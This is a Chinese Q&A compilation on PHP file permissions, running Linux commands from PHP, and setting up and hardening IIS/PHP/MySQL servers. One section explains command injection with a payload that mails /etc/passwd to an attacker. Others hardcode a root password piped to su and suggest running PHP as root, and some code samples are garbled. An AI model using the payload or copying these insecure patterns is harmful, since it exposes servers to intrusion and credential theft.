phpsystem权限

㈠ php下怎么改变lunux的文件权限

PHP 中的 chmod() 函数可以实现改变文件的权限

chmod() 函数改变文件模式（各种权限）。

如果成功则返回 TRUE，否则返回 FALSE。

chmod(file,mode)

参数说明
file 必需。规定要检查的文件。
mode 可选。规定新的权限。

mode 参数由 4 个数字组成：

第一个数字永远是 0
第二个数字规定所有者的权限
第二个数字规定所有者所属的用户组的权限
第四个数字规定其他所有人的权限

可能的值（如需设置多个权限，请对下面的数字进行总计）：

1 - 执行权限
2 - 写权限
4 - 读权限

例子

<?php
// 所有者可读写，其他人没有任何权限
chmod("test.txt",0600);

// 所有者可读写，其他人可读
chmod("test.txt",0644);

// 所有者有所有权限，其他所有人可读和执行
chmod("test.txt",0755);

// 所有者有所有权限，所有者所在的组可读
chmod("test.txt",0740);
?>

㈡ php如何实现随意执行linux命令（任意读写，删除等）

显然，你要靠php操作其范围外的文件或目录是不可能的，这是因为php的运行身份是apache，因此没办法操作root权限的文件或目录。 我们采取的办法是，用VC写个服务，该服务的运行身份是root，也就是给其最大权限，php调用该服务做操作。
当然还有另外的办法，这是我的猜测，你不妨试看看，
1、把php的运行用户改为root，这样可能会存在一定的风险。
2、在apache里面指定可以对某个root权限的文件或目录做操作，该办法没试验过。如果你能试验成功的话，希望反馈一下哦。

㈢ PHP的system解除了限制增加了权限为什么还是无法执行

这个的话有点复杂，下面我写了几种分析你看看有没有帮助。
PHP无法执行system()函数，可能有以后几种可能。
首先请开启错误时数，根据错误才好判断原因：打开php.ini中的 display_errors = On
在ISAPI模式下修改php.ini要重起WEB服务。
错误分析：
1、Warning: system() has been disabled for security reasons
该错误是由于服务器安全配置将system函数关闭了，编辑php.ini查找 disable_functions 将等号后面的 system 去掉即可。详细你可以去后盾人看看视频教学的，里面都讲的很清楚很详细。

㈣ PHP运行EXEC文件

在PHP中调用外部命令，可以用如下三种方法来实现：
1） 用PHP提供的专门函数

PHP提供共了3个专门的执行外部命令的函数：system()，exec()，passthru()。
system()
原型：string
system (string command [, int return_var])

system()函数很其它语言中的差不多，它执行给定的命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。
例子：

复制代码
代码如下:

<?php

system("/usr/local/bin/webalizer/webalizer");
?>

exec()

原型：string exec (string command [, string array [, int return_var]])
exec
()函数与system()类似，也执行给定的命令，但不输出结果，而是返回结果的最后一行。虽然它只返回命令结果的最后一行，但用第二个参数array
可以得到完整的结果，方法是把结果逐行追加到array的结尾处。所以如果array不是空的，在调用之前最好用unset()最它清掉。只有指定了第二
个参数时，才可以用第三个参数，用来取得命令执行的状态码。
例子：

复制代码
代码如下:

<?php
exec("/bin/ls -l");

exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);
?>

passthru()
原型：void passthru (string command [, int
return_var])
passthru
()只调用命令，不返回任何结果，但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus
（Unix下的一个处理图片的工具，输出二进制的原始图片的流）这样的程序。同样它也可以得到命令执行的状态码。
例子：

复制代码
代码如下:

<?php
header("Content-type:
image/gif");
passthru("./ppmtogif hunte.ppm");
?>

2）
用popen()函数打开进程

上面的方法只能简单地执行命令，却不能与命令交互。但有些时候必须向命令输入一些东西，如在增加Linux的系统用户时，要调用su来把当前用户换到root才行，而su命令必须要在命令行上输入root的密码。这种情况下，用上面提到的方法显然是不行的。

popen
()函数打开一个进程管道来执行给定的命令，返回一个文件句柄。既然返回的是一个文件句柄，那么就可以对它读和写了。在PHP3中，对这种句柄只能做单一
的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭 它。

例子1：

复制代码
代码如下:

<?php
$fp=popen("/bin/ls -l", "r");

?>

例子2：

复制代码
代码如下:

<?php
/* PHP中如何增加一个系统用户

下面是一段例程，增加一个名字为james的用户,
root密码是 verygood。仅供参考
*/
$sucommand =
"su --login root --command";
$useradd = "useradd ";
$rootpasswd =
"verygood";
$user = "james";
$user_add = sprintf("%s "%s
%s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");

@fputs($fp,$rootpasswd);
@pclose($fp);
?>

3）
用反撇号（`，也就是键盘上ESC键下面的那个，和~在同一个上面）

这个方法以前没有归入PHP的文档，是作为一个秘技存在的。方法很简单，用两个反撇号把要执行的命令括起来作为一个表达式，这个表达式的值就是命令执行的结果。如：

复制代码
代码如下:

<?php
$res='/bin/ls -l';
echo '

'.$res.'
';
?>

这个脚本的输出就象：
hunte.gif

hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么？

要考虑两个问题：安全性和超时。
先
看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地
址，然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这
个文件。程序就象这样：

复制代码
代码如下:

<?php
system("mail $to <
procts.txt");
echo "我们的产品目录已经发送到你的信箱：$to";
?>

用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址：

'--bla ; mail [email protected] < /etc/passwd ;'
那么这条命令最终变成：

'mail --bla ; mail [email protected] < /etc/passwd ; < procts.txt'

我相信，无论哪个网络管理人员见到这样的命令，都会吓出一身冷汗来。
幸
好，PHP为我们提供了两个函数：EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串
中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（），重定向（>）和从文件读入
（<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串
就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运
行。但在默认情况下，象system()等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是
把命令的输出重定向到另外一个文件或流中，如：

复制代码
代码如下:

<?php

system("/usr/local/bin/order_proc > /tmp/null &");
?>

㈤ win2003服务器安全设置中如system32 文件夹user访问权限不能读取运行，而PHP文件不能运行，

搜索cmd.exe 直接单独给权限 给予administrators权限

㈥ 如何让PHP有权限执行Linux下的命令

php执行linux的命令用system或exec就可以，只要打开safemode，但是一些系统底层的没有执行命令的不允许调用哦，实在有些命令例如zip之类想用的话，直接用php写入一个shell脚本文件再exec那个sh就好了。

㈦ windows2012 php运行权限

• 首先建一个单独访问网站的用户如IIS_USER，如果有多个网站，每个网站都建一个用户名，就算一个网站被攻击了，另一个不会同时被攻破。

  

㈧ 如何配置php服务器

1. 安装IIS
IIS是windows平台下比较成熟的web服务，安装方法也非常简单。
打开“开始”菜单，点击“管理您的服务器”，点击“添加或删除角色”（如图所示）。

2
进入预备步骤后直接点下一步。到达了选择角色的地方，选择“应用程序服务（IIS,ASP.net)”

3
之后点击下一步，出现附加组件的选择，一个是FrontPage Server Extentions，另外一个是ASP.net，这两项我们的环境中都不需要，不必选择，如果有需要，可以选择性安装。进入下一步，是选项总结，再下一步，进入安装过程，此时提示需要插入windows 2003(R2)的安装光盘，插入光盘后，选择光驱所在驱动器下的I386，点击确定，安装过程将会继续一直到结束，并且出现成功提示
4
完成后对IIS进行测试，打开“开始”菜单，点击“所有程序”，进入“管理工具”，点击“internet信息服务(IIS)管理器”
展开“网站”树型节点，删除默认网站，然后新建一个网站

5
进入向导后，进入下一步，为网站添加描述，也就是IIS中显示的网站标示，可以随便填写，再进入下一步，为网站配置主机头，我们是用来配置本地测试环境，所以把主机头配置为127.0.0.1
6
进入下一步，选择目录，目录需要提前建立好，然后选择即可。继续下一步，需要选择网站权限，这里只选择读取即可。之后便可完成网站新建向导了。
需要正常的浏览网站，还需要给网站的根目录文件夹指定相应的权限，首先在网站属性中查看网站的匿名访问账户是什么，然后将这个账户设置到网站的根目录文件夹，并设置相应的访问权限

7
网站的匿名访问账户是：IUSR_CBLH-DDEF00B671，为文件夹设置用户访问权限
8
权限配置好后，在目录中新建一个index.html文件，随意输入一些文字或者html代码即可。
在网站名称上右键，点击属性，进入“属性”后点击“文档”选项卡，在此添加一个index.html和index.php（index.php添加好是为了待会不必再做配置），然后点击“确定”或者“应用”保存配置。
然后在浏览器中的地址栏中输入“http://localhost/”或者“http://127.0.0.1/”，即可看到刚才我们建立的index.html中的内容。
9
安装fastcgi
IIS调试好后，就可以安装fastcgi了，首先需要下载IISfastcgi，下载地址是（http://www.iis.net/download/FastCGI），安装fastcgi非常简单，只需要同意协议后连续点击下一步即可，没有任何选项。

10
安装php
首先下载php在windows的安装包，下载地址http://windows.php.net/downloads/releases/archives/，这里选用php-5.3.4-nts-Win32-VC9-x86.msi做例子。下载好php-5.3.4-nts-Win32-VC9-x86.msi后，双击文件安装，接受使用协议后，为php填写安装目录，这个目录是可以更换的，指向需要放置它的位置即可。之后需要选择web服务器的安装，这里选择我们先前安装的IIS fastcgi

11
下一步需要配置安装选项，这里我们除了默认的选项之外增加了pear install(如图所示）

12
再进入下一步，就可以确认安装了。
完成安装后，还需要测试一下php是否可用。
首先打开IIS管理器，然后在先前测试IIS的网站上右键，进入“属性”，点击主目录选项卡，然后将“执行权限”配置为“纯脚本”
13
然后点击旁边的“配置”，查看是否有.php扩展名，如果没有的话，需要添加一个新项，将可执行文件指向“C:WINDOWSsystem32inetsrvfcgiext.dll”，扩展名为“.php”（注意有个点），动作限制为“GET,HEAD,POST,TRACE”，点击确定即可
步骤阅读
14
做好了这些，就可以写个小脚本来测试了，在网站的目录中新建一个test.php文件，打开后输入，保存后退出。在浏览器地址栏中输入http://localhost/test.php，即可看到php信息了。
4. 安装isapi_urlwriter ISAPI扩展组件
isapi_urlwriter ISAPI扩展组件主要用来做地址重写，重写后的虚拟静态地址对搜索引擎更友好。先将ISAPI_Rewrite3安装包解压到指定的文件目录中，然后进入网站属性窗口，选择窗口中的ISAPI筛选器选项卡，点击添加按钮，在弹出的窗口中选择ISAPI_Rewrite3解压目录中的ISAPI_Rewrite.dll文件为可执行文件并确定。

END
iis7.5 PHP环境配置
1
windows server 2008是基于NT6 平台的新型操作系统，其对硬件性能的发挥比起其它NT平台来说有了质的飞跃，已经开始普及到了广大用户中，而且操作较2003来说更为直观和简单，受到越来越多的好评。在这里我们要介绍windows server 2008中的php环境搭建。
安装IIS
windows server 2008的IIS版本为7.0，包括fastcgi，安装十分方便。
打开“开始”菜单→“服务器管理”，出现服务器管理界面

2
在图中黄色框中填入服务器ip，点击打开，之后提示输入用户名和密码，验证成功后完成登录服务器。
3
点击“下一步”之后，需要选择功能，这里需要比默认选项多增加一个“cgi”

4
点击“下一步”，将会需要确认一下安装的内容，此时点击安装，即可将IIS安装在操作系统中。
安装好IIS之后，需要进行一个测试，在浏览器地址栏中输入“http://localhost/”，如果出现IIS7的欢迎页则说明正常。接下来需要配置一个新网站，首先打开IIS管理器（“开始”→“所有程序”→“管理工具”→“internet 信息服务（IIS）管理器”）。
然后删除默认网站，在主菜单中，展开网站菜单，然后再网站名称上右键，点击删除即可
5
再新建一个网站，在“网站”上右击，点击添加网站，会出现信息网站添加的表单，首先输入网站名称，例如“stourwebcms”，路径选择为网站存放的路径，单IP的服务器可以不必选择IP，主机头填写为localhost，然后点击确定。
6
添加好网站后，需要为网站设置用户访问权限。在iis管理器左边的网站列表中选中网站，在右边的操作列表中点击“基本设置”，在弹出窗口中点击“连接为”，弹出的窗口中会出现网站的默认用户账户，也可以更改为其它的用户。确定网站的用户账户后，将此账户的访问权限设置到网站的根目录文件夹上

打开网站目录，新建一个index.html，然后用记事本打开，输入“hello stourweb”后保存，并访问本地地址“http://127.0.0.1”进行测试，网页上显示出了“hello stourweb”，说明配置成功。

7
安装php
在前面已经提过，IIS7中不必单独安装fastcgi，所以，我们只需要下载php安装包进行安装即可，下载地址：http://windows.php.net/downloads/releases/archives/ 下载好后，打开安装程序，经过引导，配置好路径，来到选择“web server setup”的地方，在这里我们选择“IIS fastcgi”
8
然后点击“next”按钮，到了选择安装选项的步骤，一般安装默认的就可以了，如果要添加的话需要点击一下前面的磁盘小图标，然后选择安装，第一项是只安装选中的项目，第二项是安装所有该项目的子项目。配置好后进入下一步

9
配置好后，点击“next”然后点击“install”即可安装php。
当php安装完成后会自动在iis的处理程序映射中增加一条fastcgi到php的映射关系

安装完成后，我们还是需要测试一下，打开刚才新建的网站目录，新建一个test.php文件，用记事本打开，输入
<?php
echo phpinfo();
?>
保存退出，再从浏览器中访问http://127.0.0.1/test.php
显示出php信息，说明php环境安装成功。
10
安装isapi_urlwriter ISAPI扩展组件
isapi_urlwriter ISAPI扩展组件主要用来做地址重写，重写后的虚拟静态地址对搜索引擎更友好。先将ISAPI_Rewrite3安装包解压到指定的文件目录中，然后双击iis的ISAPI筛选器配置项，进入网站ISAPI组件配置窗口，点击添加按钮，在弹出的窗口中选择ISAPI_Rewrite3解压目录中的ISAPI_Rewrite.dll文件为可执行文件并确定。

11
ISAPI_Rewrite3组件是一个32位的程序，因此在64位操作系统应用池进程下默认不工作，因此需要在网站所属应用进程池的高级设置中将进程池设置为32位兼容

END
Mysql数据库安装
1
下载mysql(http://www.mysql.com)，安装过程比较简单，首先配置路径，然后选择安装选项，一般采用默认安装的方式，之后会进入一个配置向导界面
步骤阅读
2
连续下一步，需要选择配置方式，这里选择配置方式，我们需要手动配置，所以选择detailed configuration，然后点击“下一步”

3
这里需要选择服务器类型，如果是开发用的测试环境，选择developer Machine ，如果是服务器用，则选择Server Machine，当然单一用途的服务器还可以选择dedicated mysql server machine。选择好后进入下一步

4
接下来是选择服务器使用，第一个是多功能数据库，可以使用 InnoDB engine和MyISAM engine。第二个选项，它的性能偏向于InnoDB，但是同时支持MyISAM engine。第三个选项是偏向于分析功能的MyISAM。至于这三个选项有什么区别，其实只要知道，MyISAM类型的数据库引擎可以为php提供强大的检索和分析功能。InnoDB的性能则偏重于存储。
所以如果只做web服务器的话选择第三项即可，如果是有其它用途，建议选择第一项。
5
下一步需要选择服务器上的连接数量，这里如果是测试用的小服务器可以选择最少的第一项，如果是流量巨大的网站，需要选择第二项，或者第三项自行填写。

之后是网络连接的选项，“enable TCP/IP Networking”可以按照需求来选择，如果不做集群的话可以把勾去掉，如果是在内网环境，不为mysql做路由规则是完全可以打开此项的。可以直接添加一个防火墙例外给3306端口。端口号可以选择，但是推荐默认的3306。还有一项是是否开启严谨模式，此项推荐勾选

6
点击下一步，选择默认字符集，这里选择自定义的utf8字符集

7
进入下一步，需要设定windows选项，这里推荐安装windows服务，并且自动启动。第二个选项，如果有必要，可以选择添加一个环境变量，可以方便命令行指向。

配置好后，进入下一步，需要为root用户设定密码，请设置一个比较复杂的密码以增加安全性，另外请牢记自己设置的密码，否则遗忘了后需要重置密码十分麻烦。还有一个是否允许root用户从远程登录的选项，此处最好不勾选，否则安全性将会降低。
到此配置就全部结束了，点击下一步，会出现安装总结，点击“execute”执行安装即可。
安装成功后，我们依然需要对此进行测试。
在网站中新建一个测试php文件test.php，我们使用pdo链接mysql作为测试。
输入
<?php
$db=new PDO("mysql:host=localhost;dbname=test","root","刚才设置的密码");
if ($db)
{
echo "ok";
}
?>
访问http://localhost/test.php，如果屏幕上打印出了ok，表示mysql安装成功。
END
安全配置建议
1
安全软件
一款好的安全软件能有效防御来自计算机病毒、恶意软件和木马的威胁，但能用于服务器的安全软件并不多，其中大部分都是收费的，平常个人所用的金山毒霸和360等不能安装到windows server系列的服务器操作系统上，但他们都有相应的服务器版本并且提供免费升级，在他们的官网上面都能够找到。
2
防火墙
合理的配置好防火墙能有效的阻止各种恶意入侵，因为各种网络入侵都是通过相应的网络端口完成的。网络端口是服务器上的各种网络服务开启的，他们对外提供各种网络服务，如http、ftp、smtp等。自己的服务器上需要提供哪些网络服务就只开启这些服务的相应端口，如服务器上提供网站服务，就需要开启http的80端口，如需要提供ftp服务就要开启21端口；有些网络服务不需要对外提供服务就不应该开启，如sql server数据库不需要对外提供服务，就应该在防火墙中关闭掉1433端口。
Windows sever 2003和2008都自带防火墙，其实能简单有效的利用这些自带的防火墙就能有效的完成端口的开闭管理。
l Windows server 2003服务器防火墙配置
1) 鼠标右键单击“网上邻居”，选择“属性”。
2) 然后鼠标右键单击“本地连接”，选择“属性”。如图选择“高级”选项，选中“Internet连接防火墙”，确定后防火墙即起了作用。
点击“设置(G)...”按钮可进行高级设置。其中列出了可用的网络服务，选中后允许其打开网络端口并通信，反之则关闭其网络通信；单击“添加”则可以增加网络服务或打开指定的网络端口

3
Windows server 2008服务器防火墙配置
1) 在控制面板中打开网络和共享中心
2) 点击“windows防火墙”弹出防火墙配置窗口，在此窗口中要确认防火墙服务已经开启
3) 单击“允许程序或功能通过Windows防火墙”弹出网络服务端口配置窗口，在此窗口中可以选择允许打开端口并通信的网络服务，单击“允许运行另一程序”来自定义开启某一网络服务或端口
4
用户管理
系统中用户的数量能越少越好，并且每个用户都被用于特定的功能，如可以新建一个专门用于对网站进行匿名授权的账户（如条件允许，可以为每个网站新建一个独立的账户进行分别授权，这些能够隔离开各网站的授权，提高各网站的安全性，不至于一个网站被入侵后能够有权限访问到其它网站的文件目录）。另外最重要的一点是要为每个账户设置一个独立且复杂的密码，防止账户密码被猜解和穷举。
5
文件系统权限管理
l C盘只给administrators 和system权限，其他的权限不给，其他的盘也可以这样设置，这里给的system权限也不一定需要给，只是由于某些第三方应用程序是以服务形式启动的，需要加上这个用户，否则造成启动不了。

l Windows目录要加上给users的默认权限，否则ASP和ASPX等应用程序就无法运行。其实没有必要单独设置Instsrv和temp等目录权限。

l 另外在c:/Documents and Settings/这里相当重要，后面的目录里的权限根本不会继承从前的设置，如果仅仅只是设置了C盘给administrators权限，而在All Users/Application Data目录下会 出现everyone用户有完全控制权限，这样入侵这可以跳转到这个目录，写入脚本或只文件，再结合其他漏洞来提升权限;
譬如利用serv-u的本地溢出提升权限，或系统遗漏有补丁，数据库的弱点，甚至社会工程学等等N多方法，在用做web/ftp服务器的系统里，建议是将这些目录都设置的锁死。其他每个盘的目录都按照这样设置，每个盘都只给adinistrators权限。
另外，还将：
net.exe
cmd.exe
tftp.exe
netstat.exe
regedit.exe
at.exe
attrib.exe
cacls.exe
format.exe
这些文件都设置只允许administrators访问。
l 网站的目录最好独立到一个磁盘中，新建一个为网站匿名访问而独立授权的账户，让此账户可以访问和编辑此目录，移除其它不必要的账户对此目录的访问权限，能有效防止网站被入侵后从而涉及到整个系统被控制

日常维护建议
1
定期运行安全软件进行快速扫描
定期运行一下安全软件，可以看到安全软件的引擎或病毒库是否已经更新到了最新版本，如果没有可以即时查找原因，看是否是安全软件未运行、升级端口被禁用或其它原因，虽然安全软件可以在后台即时扫描各种文件操作，以防止病毒入侵，但有些恶意软件、流氓软件或插件则不是实时防护的，虽然这些软件不会造成服务器宕机，但也会影响服务器性能。
2
定期检查防火墙端口配置
随着服务器上的网络服务越来越多，需要打开的网络端口也越来越多，但有些端口是不需要开放的，例如你安装了一个数据库软件（mysql、oracle等），这些数据库服务很可能只需要在你服务器的内部访问，就完全没有必要让其通过防火墙，这样能够提高服务器的安全，服务器对外提供的端口越少越好；
虽然在安装网络服务的过程中，防火墙会提示你有网络端口正在打开，是否允许通过防火墙，但有些管理员没有细心看提示，直接就同意了，造成了大量没有必要打开的网络端口被打开了，特别是一些木马或恶意软件会混水摸鱼，伪装提示信息来诱骗管理员打开网络端口，造成大量的安全隐患。进入防火墙配置界面，选择相应的端口或网络服务，点击“详细信息”则可以看到此项应用的详细信息，根据这些信息来判断其是否应该开启这个端口。
3
任务管理器中观察有无可疑进程，了解系统资源使用情况
任务管理器可以简单并快速的了解服务系统资源的使用情况，并即时查看系统运行的进程和他们占用的系统资源，根据服务器上已开启的各种应用的服务来判断哪些进程是非法的，哪些进程占用的系统资源过多。了解到这些信息后就可以即时的对服务器进行调整，特别是占用资源过多的进程进行分析，看是否有什么异常并即时进行调整。
l 观察系统进程，并自定义进程属性
4
查看网络使用情况
查看系统资源使用情况
检查IIS，了解网站安装情况
随时了解服务器上网站的安装状况，并做以下检查：
1、看各个网站定义的主机头是否异常
2、 绑定的域名是否完整
3、 主目录设置是正确
4、用户权限设置是否合理
5、 查看IIS的应用程序池设置是否合理，每个池下面托管的网站是否过多，是否需要设置新的应用池，是否有多余的应用池可以删除。
查看系统日志，仔细检查错误、警告日志发生的原因，并急时修复相应的问题。
检查系统用户，查看有无多余，可疑用户账户，查看每个账户所属的用户组，特别是administrators组下面的用户。服务器被入侵时会出现一些欺骗性的账户并被加入到administrators组中，特别留心新建的多余账户，弄清这些账户的用途，如果发现是入侵者建立的账户，要即时查找账户是被创建的原因，并修复相应的漏洞。
检查文件系统，确保磁盘被合理分区，各个分区应该有各自的功能，如系统、数据库、网站、备份等。各个分区的用户授权是不相同的，如系统、备份等不需要网站的专门授权账户访问，数据库分区需要对数据库账户进行单独的授权等。既然规划好了文件分区和功能，并进行了相应的授权，就要防止文件被乱放，以免造成安全隐患。
还要经常检查各种新建的文件夹和文件（特别是来历不明，名称畸形的隐藏文件夹和文件）这些都有可能是入侵者留下的入侵痕迹。
清除垃圾文件，随时系统运行时间的增加，会产生很多的临时文件和日志文件，占用宝贵的磁盘资源，如果磁盘的可用空间过小（特别是系统盘）还会影响服务器性能。
1、临时文件（安装程序、系统升级、应用程序等产生的）产生的，主要在系统盘，可以看哪些文件夹的体积异常大，可分析其内部文件，确认是临时文件后将其删除
2、 日志文件，主要是IIS产生的，这些日志文件对于查看网站运行状态、访问历史很有用，但日志有时效性，如果超过其三个月就没有什么用处了，但它会占用大量的磁盘空间，所以需要定期将其删除。
定期检查磁盘状态并进行碎片整理，随着系统运行时间的增长，特别是大量的IO操作后，磁盘上会产生大量的文件碎片，这些碎片过多则会严重影响服务器性能，所以定期（建议一个月）进行磁盘碎片检查，如果系统提醒需要进行碎片整理，则进行整理。
及时升级操作系统补丁，操作系统有各种大量的补丁，特别是一些重要的安全补丁需要即时升级，这样会有效防止黑客和病毒入侵。
及时备份重要的文件、应用、数据库。备份分为本地备份和异地备份，有条件的可以进行异地备份，备份是为了以防万一，当数据丢失或应用损坏时，备份就是救命稻草，因此合理的备份计划是非常有必要的。
不要随意下载安装来历不明的软件，特别是需要连接网络或需要打开端口的。现在网上许多的程序都内置有木马或恶意程序，所以不要下载和安装网上的不明软件，特别是一些小网站的。
END

㈨ php权限管理如何实现

我得做法是，用形如：

修改文章,1,删除文章,1,新增文章,1
这样的字符串来保存权限值
读取后explode为数组，需要校验权限的时候，用
if($array["修改文章"])
判断是否有权限。

㈩ php调用linux命令更改文件权限

我们的服务器是这样做的：
php一般是以apache用户身份去执行的，把apache加入到存储你文件的父文件夹属组里去，然后改该父文件夹权限为775，这样属组成员就有写的权限，而apache属于这个组就可以改写该目录下所有文件的权限，当然，属组最好不要是root，你可以为该文件夹改个其它普通用户组。

改apache/php的运行用户方法不安全，不建议使用。